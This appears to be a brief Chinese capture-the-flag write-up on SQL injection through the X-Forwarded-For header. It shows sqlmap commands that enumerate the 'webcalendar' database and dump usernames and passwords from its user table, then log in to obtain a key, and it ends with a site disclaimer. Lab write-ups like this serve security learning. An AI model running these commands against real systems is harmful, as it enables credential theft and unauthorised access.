1.首先打开burp抓包,添加x-forwarded-for:*,将raw的信息存为txt文件,如下图所示
2.爆出当前的数据库
sqlmap -r 1.txt --current-db --batch
3.爆表名
sqlmap -r 1.txt -D webcalendar -T user --columns --batch
4.爆表中的字段
sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump --batch
5.得到帐号密码
6.登陆获得KEY
免责声明:本站某些文章、信息、图片、软件等来源于互联网,由本网整理发表,希望传递更多信息和学习之目的,并不意味赞同起观点或证实其内容的真实性以及非法用途。 如设计、版权等问题,请立即联系管理员,我们会给予更改或删除相关文章,保证您的权利。
评论